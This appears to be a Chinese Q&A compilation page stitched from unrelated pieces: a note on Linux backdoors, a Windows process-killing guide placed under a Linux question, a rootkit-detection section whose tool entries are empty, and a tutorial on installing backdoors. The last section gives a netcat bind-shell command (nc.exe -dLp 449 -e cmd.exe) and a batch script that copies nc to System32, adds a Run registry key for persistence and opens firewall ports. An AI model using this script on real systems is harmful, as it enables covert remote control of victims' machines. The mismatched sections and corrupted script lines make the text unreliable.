‘壹’ linux开源就没有后门了吗
有。linux是一个开源的操作系统,这意味着任何人都可以查看和修改其源代码,由于linux是开源的,理论上任何人都可以在代码中添加后门,但是,由于linux社区的广泛参与和代码审查,发现和利用后门的机会相对较小。
‘贰’ linux系统后台无法使用命令进行操作怎么办注:无法重起机子,无法杀进程等。。
Windows XP/2000的任务管理器是一个非常有用的工具,能让你看到系统中正在运行哪些程序(进程),只要你平时多看任务管理器中的进程列表,熟悉系统的基本进程,就可以随时发现可疑进程,这对防范木马和病毒大有裨益!不过有一些可疑进程,你用任务管理器却无法杀掉,这该怎么办呢?
一、哪些系统进程不能关掉
Windows运行的时候,会启动多个进程。只要你按下“Ctrl+Alt+Del”键打开任务管理器,点击“查看”/选择列,勾选“PIO(进程标识符)”,然后单击“进程”标签,即可看到这些进程。不过有一些进程个人用户根本用不到,例如Systray.exe(显示系统托盘小喇叭图标)、Ctfmon.exe(微软Office输入法)、Winampa.exe等,我们完全可以禁止它们,这样做并不会影响系统的正常运行。
二、如何关闭任务管理器杀不了的进程
如果你在任务管理器中无法关闭某个可疑进程,可以使用下面的方法强行关闭,注意不要杀掉进程表中的系统核心进程:
1. 使用Windows XP/2000自带的工具
从Windows 2000开始,Windows系统就自带了一个用户态调试工具Ntsd,它能够杀掉大部分进程,因为被调试器附着的进程会随调试器一起退出,所以只要你在命令行下使用Ntsd调出某进程,然后退出Ntsd即可终止该进程,而且使用Ntsd会自动获得Debug权限,因此Ntsd能杀掉大部分的进程。
操作方法:单击“开始”/程序/附件/命令提示符,输入命令:ntsd -c q -p PID(把最后那个PID,改成你要终止的进程的PID)。在进程列表中你可以查到某个进程的PID,例如我们要关闭图1中的Explorer.exe进程,输入:ntsd -c q -p 408即可。
以上参数-p表示后面跟随的是进程PID, -c q表示执行退出Ntsd的调试命令,从命令行把以上参数传递过去就行了。
2. 使用专门的软件来杀进程
任务管理器杀不掉的进程,你可以使用专门的软件关闭。有很多软件可以杀进程,例如进程杀手、IceSword、柳叶擦眼、系统查看大师、Kill process等。
(1)进程杀手2.5()
它能够浏览系统中正在运行的所有进程,包括用Ctrl+Alt+Del 看不到的进程,可以精简进程、自动中止系统基本进程以外的所有进程,对木马和病毒进程有一定清除作用,你可以用它随时中止任一个正在运行的进程,选中该进程,按“中止进程”按钮即可。
(2)IceSword()
如今系统级木马后门功能越来越强,一般都可轻易隐藏进程、端口、注册表、文件信息,普通进程工具根本无法发现这些“幕后黑手”。IceSword使用大量新颖的内核技术,可以查出所有隐藏进程。
要查看当前进程,请点击“进程”按钮,在右部列出的进程中,隐藏的进程会以红色醒目地标记出,以方便查找系统级后门。如果要结束某进程,可以先选中它(按住Ctrl键可选择多个进程),然后使用右键菜单的“结束进程”,即可关闭之。
(3)柳叶擦眼
它可以列出系统中所有的进程(包括隐藏的),并可以杀死进程,能自动标示出系统文件,自动中止基本进程外的所有进程,还具有IE保护功能。
运行软件后,单击“柳叶擦眼”可以显示当前正在运行的所有进程,你只需注意那些“定义级别”为“未知”及“危险”的进程,按“降妖伏魔”按钮关闭它们即可。
(4)系统查看大师1.0
目前许多木马都是在后台运行的,它们运行时会隐藏自己的窗口,因此你无法在屏幕上看到它们。该软件可以获取隐藏的不可见窗口,让你发现木马踪影、关闭之。
软件运行后,在左侧视图中点击“取不可见窗口”按钮,右侧的窗口中就会显示出所有当前运行的、隐藏的不可见窗口标题,选定其中的可疑窗口,然后点击右下端的“结束此窗口”按钮,即可关闭之。如果你要关闭某进程,可以单击“进程列表”按钮,选中该进程,然后右击鼠标在弹出的窗口中,单击“结束进程”即可。
‘叁’ Linux后门入侵检测工具以及最新bash漏洞解决方法
Linux后门入侵检测工具及最新bash漏洞解决方法
Linux后门入侵检测工具:
chkrootkit:
RKHunter:
最新bash漏洞解决方法:
总结: 使用chkrootkit和RKHunter等工具可以有效检测Linux系统是否被植入后门或感染rootkit。 对于新发现的bash漏洞,应立即更新bash到最新版本以确保系统安全。
‘肆’ 如何在Windows,Linux中安装后门
0×00 准备工作
假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。
Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :
1.下载额外的文件和附加持续.
2.编辑修改指定文件.
3.快速创建执行后门.
4.控制远程服务器并进行恶作剧 :)
为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。
便携式工具(Portable Applications)
便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。
1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录
创建 Windows 7 工具集
gVim (跨平台的文本编辑器, 提供强大的命令行操作交互)
Wget (下载 windows 64 位版本)
Netcat
有Kali系统的可以用命令 “find / -name nc.exe”搜索到 http://www.kali.org/ 或者下载已经编译好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初试 Netcat 后门
nc.exe -dLp 449 -e cmd.exe -L 这个选项会开启一个监听服务并等待客户端连接, 在客户端连接成功之后,会提供相应的交互服务。
– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)
– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)
– d 采取静默监听模式,避免nc运行过程中,产生过多额外的日志信息
Windows 7 后门安装批处理脚本
@echo off
Rem 拷贝文件到系统目录
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火墙规则,开放监听的449端口,允许外部连接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火墙规则,允许nc.exe对外提供连接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"